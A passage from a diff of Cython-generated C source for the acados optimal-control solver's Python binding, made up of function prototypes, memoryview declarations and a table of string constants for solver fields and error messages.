__Pyx_c_sum_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex); + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex, __pyx_t_double_complex); + #endif +#endif + +/* MemviewSliceCopyTemplate.proto */ +static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object); + +/* MemviewSliceInit.proto */ +#define __Pyx_BUF_MAX_NDIMS %(BUF_MAX_NDIMS)d +#define __Pyx_MEMVIEW_DIRECT 1 +#define __Pyx_MEMVIEW_PTR 2 +#define __Pyx_MEMVIEW_FULL 4 +#define __Pyx_MEMVIEW_CONTIG 8 +#define __Pyx_MEMVIEW_STRIDED 16 +#define __Pyx_MEMVIEW_FOLLOW 32 +#define __Pyx_IS_C_CONTIG 1 +#define __Pyx_IS_F_CONTIG 2 +static int __Pyx_init_memviewslice( + struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference); +static CYTHON_INLINE int __pyx_add_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +static CYTHON_INLINE int __pyx_sub_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +#define __pyx_get_slice_count_pointer(memview) (&memview->acquisition_count) +#define __PYX_INC_MEMVIEW(slice, have_gil) __Pyx_INC_MEMVIEW(slice, have_gil, __LINE__) +#define __PYX_XCLEAR_MEMVIEW(slice, have_gil) __Pyx_XCLEAR_MEMVIEW(slice, have_gil, __LINE__) +static CYTHON_INLINE void __Pyx_INC_MEMVIEW(__Pyx_memviewslice *, int, int); +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *, int, int); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self); /* proto*/ +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto*/ +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self); /* proto*/ +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self); /* proto*/ + +/* Module declarations from "cython.view" */ + +/* Module declarations from "cython.dataclasses" */ + +/* Module declarations from "cython" */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libc.stdio" */ + +/* Module declarations from "libc" */ + +/* Module declarations from "acados_solver_common" */ + +/* Module declarations from "acados_solver" */ + +/* Module declarations from "__builtin__" */ + +/* Module declarations from "cpython.type" */ + +/* Module declarations from "cpython" */ + +/* Module declarations from "cpython.object" */ + +/* Module declarations from "cpython.ref" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "acados_template.acados_ocp_solver_pyx" */ +static PyObject *__pyx_collections_abc_Sequence = 0; +static PyObject *generic = 0; +static PyObject *strided = 0; +static PyObject *indirect = 0; +static PyObject *contiguous = 0; +static PyObject *indirect_contiguous = 0; +static int __pyx_memoryview_thread_locks_used; +static PyThread_type_lock __pyx_memoryview_thread_locks[8]; +static CYTHON_INLINE PyObject *__Pyx_carray_to_py_int(int *, Py_ssize_t); /*proto*/ +static CYTHON_INLINE PyObject *__Pyx_carray_to_tuple_int(int *, Py_ssize_t); /*proto*/ +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *); /*proto*/ +static struct __pyx_array_obj *__pyx_array_new(PyObject *, Py_ssize_t, char *, char *, char *); /*proto*/ +static PyObject *__pyx_memoryview_new(PyObject *, int, int, __Pyx_TypeInfo *); /*proto*/ +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *); /*proto*/ +static PyObject *_unellipsify(PyObject *, int); /*proto*/ +static int assert_direct_dimensions(Py_ssize_t *, int); /*proto*/ +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *, PyObject *); /*proto*/ +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int, int); /*proto*/ +static char *__pyx_pybuffer_index(Py_buffer *, char *, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memslice_transpose(__Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice, int, PyObject *(*)(char *), int (*)(char *, PyObject *), int); /*proto*/ +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static Py_ssize_t abs_py_ssize_t(Py_ssize_t); /*proto*/ +static char __pyx_get_best_slice_order(__Pyx_memviewslice *, int); /*proto*/ +static void _copy_strided_to_strided(char *, Py_ssize_t *, char *, Py_ssize_t *, Py_ssize_t *, Py_ssize_t *, int, size_t); /*proto*/ +static void copy_strided_to_strided(__Pyx_memviewslice *, __Pyx_memviewslice *, int, size_t); /*proto*/ +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *, int); /*proto*/ +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *, Py_ssize_t *, Py_ssize_t, int, char); /*proto*/ +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *, __Pyx_memviewslice *, char, int); /*proto*/ +static int __pyx_memoryview_err_extents(int, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memoryview_err_dim(PyObject *, PyObject *, int); /*proto*/ +static int __pyx_memoryview_err(PyObject *, PyObject *); /*proto*/ +static int __pyx_memoryview_err_no_memory(void); /*proto*/ +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice, __Pyx_memviewslice, int, int, int); /*proto*/ +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *, int, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *, int, size_t, void *, int); /*proto*/ +static void __pyx_memoryview__slice_assign_scalar(char *, Py_ssize_t *, Py_ssize_t *, int, size_t, void *); /*proto*/ +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *, PyObject *); /*proto*/ +/* #### Code section: typeinfo ### */ +static __Pyx_TypeInfo __Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t = { "float64_t", NULL, sizeof(__pyx_t_5numpy_float64_t), { 0 }, 0, 'R', 0, 0 }; +static __Pyx_TypeInfo __Pyx_TypeInfo_double = { "double", NULL, sizeof(double), { 0 }, 0, 'R', 0, 0 }; +static __Pyx_TypeInfo __Pyx_TypeInfo_unsigned_char = { "unsigned char", NULL, sizeof(unsigned char), { 0 }, 0, __PYX_IS_UNSIGNED(unsigned char) ? 'U' : 'I', __PYX_IS_UNSIGNED(unsigned char), 0 }; +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "acados_template.acados_ocp_solver_pyx" +extern int __pyx_module_is_main_acados_template__acados_ocp_solver_pyx; +int __pyx_module_is_main_acados_template__acados_ocp_solver_pyx = 0; + +/* Implementation of "acados_template.acados_ocp_solver_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_AssertionError; +static PyObject *__pyx_builtin_NotImplementedError; +static PyObject *__pyx_builtin_range; +static PyObject *__pyx_builtin_open; +static PyObject *__pyx_builtin_print; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin___import__; +static PyObject *__pyx_builtin_ValueError; +static PyObject *__pyx_builtin_MemoryError; +static PyObject *__pyx_builtin_enumerate; +static PyObject *__pyx_builtin_Ellipsis; +static PyObject *__pyx_builtin_id; +static PyObject *__pyx_builtin_IndexError; +static PyObject *__pyx_builtin_ImportError; +/* #### Code section: string_decls ### */ +static const char __pyx_k_[] = ": "; +static const char __pyx_k_F[] = "F"; +static const char __pyx_k_N[] = "N"; +static const char __pyx_k_O[] = "O"; +static const char __pyx_k_c[] = "c"; +static const char __pyx_k_f[] = "f"; +static const char __pyx_k_i[] = "i"; +static const char __pyx_k_m[] = "m"; +static const char __pyx_k_n[] = "n"; +static const char __pyx_k_p[] = "p"; +static const char __pyx_k_r[] = "r"; +static const char __pyx_k_t[] = "t"; +static const char __pyx_k_u[] = "u"; +static const char __pyx_k_w[] = "w"; +static const char __pyx_k_x[] = "x"; +static const char __pyx_k_z[] = "z"; +static const char __pyx_k__2[] = "."; +static const char __pyx_k__3[] = "*"; +static const char __pyx_k__6[] = "'"; +static const char __pyx_k__7[] = ")"; +static const char __pyx_k_ex[] = "ex"; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_id[] = "id"; +static const char __pyx_k_np[] = "np"; +static const char __pyx_k_nx[] = "nx"; +static const char __pyx_k_os[] = "os"; +static const char __pyx_k_pi[] = "pi"; +static const char __pyx_k_sl[] = "sl"; +static const char __pyx_k_su[] = "su"; +static const char __pyx_k_SQP[] = "SQP"; +static const char __pyx_k__14[] = ""; +static const char __pyx_k__15[] = "_"; +static const char __pyx_k__29[] = ", "; +static const char __pyx_k__84[] = "?"; +static const char __pyx_k_abc[] = "abc"; +static const char __pyx_k_and[] = " and "; +static const char __pyx_k_get[] = "get"; +static const char __pyx_k_got[] = " (got "; +static const char __pyx_k_int[] = "int"; +static const char __pyx_k_key[] = "key"; +static const char __pyx_k_lam[] = "lam"; +static const char __pyx_k_lbu[] = "lbu"; +static const char __pyx_k_lbx[] = "lbx"; +static const char __pyx_k_msg[] = "msg"; +static const char __pyx_k_new[] = "__new__"; +static const char __pyx_k_obj[] = "obj"; +static const char __pyx_k_out[] = "out"; +static const char __pyx_k_set[] = "set"; +static const char __pyx_k_sys[] = "sys"; +static const char __pyx_k_t_2[] = "t_"; +static const char __pyx_k_u_2[] = "u_"; +static const char __pyx_k_ubu[] = "ubu"; +static const char __pyx_k_ubx[] = "ubx"; +static const char __pyx_k_x_2[] = "x_"; +static const char __pyx_k_z_2[] = "z_"; +static const char __pyx_k_None[] = "None"; +static const char __pyx_k_TODO[] = "TODO!"; +static const char __pyx_k_base[] = "base"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_dims[] = "dims"; +static const char __pyx_k_dump[] = "dump"; +static const char __pyx_k_exit[] = "__exit__"; +static const char __pyx_k_join[] = "join"; +static const char __pyx_k_json[] = "json"; +static const char __pyx_k_keys[] = "keys"; +static const char __pyx_k_load[] = "load"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_mode[] = "mode"; +static const char __pyx_k_name[] = "name"; +static const char __pyx_k_ndim[] = "ndim"; +static const char __pyx_k_open[] = "open"; +static const char __pyx_k_pack[] = "pack"; +static const char __pyx_k_path[] = "path"; +static const char __pyx_k_pi_2[] = "pi_"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_size[] = "size"; +static const char __pyx_k_sl_2[] = "sl_"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_step[] = "step"; +static const char __pyx_k_stop[] = "stop"; +static const char __pyx_k_su_2[] = "su_"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_yref[] = "yref"; +static const char __pyx_k_ASCII[] = "ASCII"; +static const char __pyx_k_alpha[] = "alpha"; +static const char __pyx_k_array[] = "array"; +static const char __pyx_k_class[] = "__class__"; +static const char __pyx_k_count[] = "count"; +static const char __pyx_k_dtype[] = "dtype"; +static const char __pyx_k_enter[] = "__enter__"; +static const char __pyx_k_error[] = "error"; +static const char __pyx_k_field[] = "field"; +static const char __pyx_k_flags[] = "flags"; +static const char __pyx_k_index[] = "index"; +static const char __pyx_k_lam_2[] = "lam_"; +static const char __pyx_k_numpy[] = "numpy"; +static const char __pyx_k_order[] = "order"; +static const char __pyx_k_print[] = "print"; +static const char __pyx_k_range[] = "range"; +static const char __pyx_k_reset[] = "reset"; +static const char __pyx_k_shape[] = "shape"; +static const char __pyx_k_solve[] = "solve"; +static const char __pyx_k_split[] = "split"; +static const char __pyx_k_stage[] = "stage"; +static const char __pyx_k_start[] = "start"; +static const char __pyx_k_utf_8[] = "utf-8"; +static const char __pyx_k_value[] = "value_"; +static const char __pyx_k_y_ref[] = "y_ref"; +static const char __pyx_k_zeros[] = "zeros"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_encode[] = "encode"; +static const char __pyx_k_fields[] = "fields"; +static const char __pyx_k_format[] = "format"; +static const char __pyx_k_getcwd[] = "getcwd"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_indent[] = "indent"; +static const char __pyx_k_isfile[] = "isfile"; +static const char __pyx_k_json_2[] = ".json"; +static const char __pyx_k_name_2[] = "__name__"; +static const char __pyx_k_pickle[] = "pickle"; +static const char __pyx_k_qp_mu0[] = "qp_mu0"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_res_eq[] = "res_eq"; +static const char __pyx_k_stat_m[] = "stat_m"; +static const char __pyx_k_stat_n[] = "stat_n"; +static const char __pyx_k_struct[] = "struct"; +static const char __pyx_k_tol_eq[] = "tol_eq"; +static const char __pyx_k_tolist[] = "tolist"; +static const char __pyx_k_unpack[] = "unpack"; +static const char __pyx_k_update[] = "update"; +static const char __pyx_k_utcnow[] = "utcnow"; +static const char __pyx_k_SQP_RTI[] = "SQP_RTI"; +static const char __pyx_k_default[] = "default"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_field_2[] = "field_"; +static const char __pyx_k_float64[] = "float64"; +static const char __pyx_k_fortran[] = "fortran"; +static const char __pyx_k_iterate[] = "iterate"; +static const char __pyx_k_memview[] = "memview"; +static const char __pyx_k_out_mat[] = "out_mat"; +static const char __pyx_k_qp_iter[] = "qp_iter"; +static const char __pyx_k_time_qp[] = "time_qp"; +static const char __pyx_k_value_2[] = "value"; +static const char __pyx_k_z_guess[] = "z_guess"; +static const char __pyx_k_Ellipsis[] = "Ellipsis"; +static const char __pyx_k_Sequence[] = "Sequence"; +static const char __pyx_k_at_stage[] = "\" at stage "; +static const char __pyx_k_cost_set[] = "cost_set"; +static const char __pyx_k_datetime[] = "datetime"; +static const char __pyx_k_filename[] = "filename"; +static const char __pyx_k_get_cost[] = "get_cost"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_itemsize[] = "itemsize"; +static const char __pyx_k_min_size[] = "min_size"; +static const char __pyx_k_pyx_type[] = "__pyx_type"; +static const char __pyx_k_register[] = "register"; +static const char __pyx_k_res_comp[] = "res_comp"; +static const char __pyx_k_res_ineq[] = "res_ineq"; +static const char __pyx_k_res_stat[] = "res_stat"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_solution[] = "solution"; +static const char __pyx_k_sqp_iter[] = "sqp_iter"; +static const char __pyx_k_strftime[] = "strftime"; +static const char __pyx_k_time_lin[] = "time_lin"; +static const char __pyx_k_time_reg[] = "time_reg"; +static const char __pyx_k_time_sim[] = "time_sim"; +static const char __pyx_k_time_tot[] = "time_tot"; +static const char __pyx_k_tol_comp[] = "tol_comp"; +static const char __pyx_k_tol_ineq[] = "tol_ineq"; +static const char __pyx_k_tol_stat[] = "tol_stat"; +static const char __pyx_k_you_have[] = " (you have "; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_alpha_min[] = "alpha_min"; +static const char __pyx_k_enumerate[] = "enumerate"; +static const char __pyx_k_for_field[] = " for field \""; +static const char __pyx_k_get_stats[] = "get_stats"; +static const char __pyx_k_int_value[] = "int_value"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_overwrite[] = "overwrite"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_qp_tol_eq[] = "qp_tol_eq"; +static const char __pyx_k_recompute[] = "recompute"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_residuals[] = "residuals"; +static const char __pyx_k_rti_phase[] = "rti_phase"; +static const char __pyx_k_sort_keys[] = "sort_keys"; +static const char __pyx_k_time_glob[] = "time_glob"; +static const char __pyx_k_IndexError[] = "IndexError"; +static const char __pyx_k_ValueError[] = "ValueError"; +static const char __pyx_k_full_stats[] = "full_stats"; +static const char __pyx_k_int_fields[] = "int_fields"; +static const char __pyx_k_mem_fields[] = "mem_fields"; +static const char __pyx_k_model_name[] = "model_name"; +static const char __pyx_k_out_fields[] = "out_fields"; +static const char __pyx_k_pyx_result[] = "__pyx_result"; +static const char __pyx_k_pyx_vtable[] = "__pyx_vtable__"; +static const char __pyx_k_qp_tau_min[] = "qp_tau_min"; +static const char __pyx_k_statistics[] = "statistics"; +static const char __pyx_k_xdot_guess[] = "xdot_guess"; +static const char __pyx_k_ImportError[] = "ImportError"; +static const char __pyx_k_MemoryError[] = "MemoryError"; +static const char __pyx_k_PickleError[] = "PickleError"; +static const char __pyx_k_collections[] = "collections"; +static const char __pyx_k_cost_fields[] = "cost_fields"; +static const char __pyx_k_options_set[] = "options_set"; +static const char __pyx_k_print_level[] = "print_level"; +static const char __pyx_k_qp_tol_comp[] = "qp_tol_comp"; +static const char __pyx_k_qp_tol_ineq[] = "qp_tol_ineq"; +static const char __pyx_k_qp_tol_stat[] = "qp_tol_stat"; +static const char __pyx_k_step_length[] = "step_length"; +static const char __pyx_k_time_sim_ad[] = "time_sim_ad"; +static const char __pyx_k_time_sim_la[] = "time_sim_la"; +static const char __pyx_k_value_shape[] = "value_shape"; +static const char __pyx_k_double_value[] = "double_value"; +static const char __pyx_k_dynamics_get[] = "dynamics_get"; +static const char __pyx_k_get_stat_int[] = "__get_stat_int"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_load_iterate[] = "load_iterate"; +static const char __pyx_k_pyx_checksum[] = "__pyx_checksum"; +static const char __pyx_k_string_value[] = "string_value"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_version_info[] = "version_info"; +static const char __pyx_k_Y_m_d_H_M_S_f[] = "%Y-%m-%d-%H:%M:%S.%f"; +static const char __pyx_k_class_getitem[] = "__class_getitem__"; +static const char __pyx_k_double_fields[] = "double_fields"; +static const char __pyx_k_get_residuals[] = "get_residuals"; +static const char __pyx_k_globalization[] = "globalization"; +static const char __pyx_k_qp_warm_start[] = "qp_warm_start"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_store_iterate[] = "store_iterate"; +static const char __pyx_k_string_fields[] = "string_fields"; +static const char __pyx_k_time_qp_xcond[] = "time_qp_xcond"; +static const char __pyx_k_AssertionError[] = "AssertionError"; +static const char __pyx_k_asfortranarray[] = "asfortranarray"; +static const char __pyx_k_full_step_dual[] = "full_step_dual"; +static const char __pyx_k_new_time_steps[] = "new_time_steps"; +static const char __pyx_k_with_dimension[] = " with dimension "; +static const char __pyx_k_View_MemoryView[] = "View.MemoryView"; +static const char __pyx_k_allocate_buffer[] = "allocate_buffer"; +static const char __pyx_k_alpha_reduction[] = "alpha_reduction"; +static const char __pyx_k_collections_abc[] = "collections.abc"; +static const char __pyx_k_constraints_set[] = "constraints_set"; +static const char __pyx_k_dtype_is_object[] = "dtype_is_object"; +static const char __pyx_k_eval_param_sens[] = "eval_param_sens"; +static const char __pyx_k_get_stat_double[] = "__get_stat_double"; +static const char __pyx_k_get_stat_matrix[] = "__get_stat_matrix"; +static const char __pyx_k_nlp_solver_type[] = "nlp_solver_type"; +static const char __pyx_k_pyx_PickleError[] = "__pyx_PickleError"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_print_statistics[] = "print_statistics"; +static const char __pyx_k_qp_solver_cond_N[] = "qp_solver_cond_N"; +static const char __pyx_k_ascontiguousarray[] = "ascontiguousarray"; +static const char __pyx_k_pyx_unpickle_Enum[] = "__pyx_unpickle_Enum"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_constraints_fields[] = "constraints_fields"; +static const char __pyx_k_set_new_time_steps[] = "set_new_time_steps"; +static const char __pyx_k_strided_and_direct[] = ""; +static const char __pyx_k_NotImplementedError[] = "NotImplementedError"; +static const char __pyx_k_get_pointers_solver[] = "__get_pointers_solver"; +static const char __pyx_k_initialize_t_slacks[] = "initialize_t_slacks"; +static const char __pyx_k_time_qp_solver_call[] = "time_qp_solver_call"; +static const char __pyx_k_warm_start_first_qp[] = "warm_start_first_qp"; +static const char __pyx_k_strided_and_indirect[] = ""; +static const char __pyx_k_AcadosOcpSolverCython[] = "AcadosOcpSolverCython"; +static const char __pyx_k_Invalid_shape_in_axis[] = "Invalid shape in axis "; +static const char __pyx_k_contiguous_and_direct[] = ""; +static const char __pyx_k_globalization_use_SOC[] = "globalization_use_SOC"; +static const char __pyx_k_Cannot_index_with_type[] = "Cannot index with type '"; +static const char __pyx_k_MemoryView_of_r_object[] = ""; +static const char __pyx_k_eps_sufficient_descent[] = "eps_sufficient_descent"; +static const char __pyx_k_MemoryView_of_r_at_0x_x[] = ""; +static const char __pyx_k_contiguous_and_indirect[] = ""; +static const char __pyx_k_update_qp_solver_cond_N[] = "update_qp_solver_cond_N"; +static const char __pyx_k_with_dimension_you_have[] = "with dimension {} (you have {})"; +static const char __pyx_k_AcadosOcpSolverCython_get[] = "AcadosOcpSolverCython.get"; +static const char __pyx_k_AcadosOcpSolverCython_set[] = "AcadosOcpSolverCython.set"; +static const char __pyx_k_Dimension_d_is_not_direct[] = "Dimension %d is not direct"; +static const char __pyx_k_stored_current_iterate_in[] = "stored current iterate in "; +static const char __pyx_k_Index_out_of_bounds_axis_d[] = "Index out of bounds (axis %d)"; +static const char __pyx_k_AcadosOcpSolverCython_reset[] = "AcadosOcpSolverCython.reset"; +static const char __pyx_k_AcadosOcpSolverCython_solve[] = "AcadosOcpSolverCython.solve"; +static const char __pyx_k_Step_may_not_be_zero_axis_d[] = "Step may not be zero (axis %d)"; +static const char __pyx_k_itemsize_0_for_cython_array[] = "itemsize <= 0 for cython.array"; +static const char __pyx_k_store_iterate_locals_lambda[] = "store_iterate.."; +static const char __pyx_k_time_solution_sensitivities[] = "time_solution_sensitivities"; +static const char __pyx_k_unable_to_allocate_array_data[] = "unable to allocate array data."; +static const char __pyx_k_AcadosOcpSolverCython_cost_set[] = "AcadosOcpSolverCython.cost_set"; +static const char __pyx_k_AcadosOcpSolverCython_get_cost[] = "AcadosOcpSolverCython.get_cost"; +static const char __pyx_k_strided_and_direct_or_indirect[] = ""; +static const char __pyx_k_AcadosOcpSolverCython__get_poin[] = "_AcadosOcpSolverCython__get_pointers_solver"; +static const char __pyx_k_AcadosOcpSolverCython__get_stat[] = "_AcadosOcpSolverCython__get_stat_int"; +static const char __pyx_k_AcadosOcpSolverCython_get_field[] = "AcadosOcpSolverCython.get(): field {} does not exist at final stage {}."; +static const char __pyx_k_AcadosOcpSolverCython_get_is_an[] = "AcadosOcpSolverCython.get(): {} is an invalid argument. \n Possible values are {}. Exiting."; +static const char __pyx_k_AcadosOcpSolverCython_get_stage[] = "AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}."; +static const char __pyx_k_AcadosOcpSolverCython_get_stats[] = "AcadosOcpSolverCython.get_stats"; +static const char __pyx_k_AcadosOcpSolverCython_update_qp[] = "AcadosOcpSolverCython.update_qp_solver_cond_N"; +static const char __pyx_k_numpy_core_multiarray_failed_to[] = "numpy.core.multiarray failed to import"; +static const char __pyx_k_AcadosOcpSolverCython___get_poin[] = "AcadosOcpSolverCython.__get_pointers_solver"; +static const char __pyx_k_AcadosOcpSolverCython___get_stat[] = "AcadosOcpSolverCython.__get_stat_int"; +static const char __pyx_k_AcadosOcpSolverCython___reduce_c[] = "AcadosOcpSolverCython.__reduce_cython__"; +static const char __pyx_k_AcadosOcpSolverCython___setstate[] = "AcadosOcpSolverCython.__setstate_cython__"; +static const char __pyx_k_AcadosOcpSolverCython_constraint[] = "AcadosOcpSolverCython.constraints_set(): mismatching dimension"; +static const char __pyx_k_AcadosOcpSolverCython_cost_set_m[] = "AcadosOcpSolverCython.cost_set(): mismatching dimension"; +static const char __pyx_k_AcadosOcpSolverCython_does_not_s[] = "AcadosOcpSolverCython: does not support set_new_time_steps() since it is only a prototyping feature"; +static const char __pyx_k_AcadosOcpSolverCython_dynamics_g[] = "AcadosOcpSolverCython.dynamics_get"; +static const char __pyx_k_AcadosOcpSolverCython_eval_param[] = "AcadosOcpSolverCython.eval_param_sens(): index must be Integer."; +static const char __pyx_k_AcadosOcpSolverCython_get_residu[] = "AcadosOcpSolverCython.get_residuals"; +static const char __pyx_k_AcadosOcpSolverCython_load_itera[] = "AcadosOcpSolverCython.load_iterate"; +static const char __pyx_k_AcadosOcpSolverCython_options_se[] = "AcadosOcpSolverCython.options_set() does not support field {}.\n Possible values are {}."; +static const char 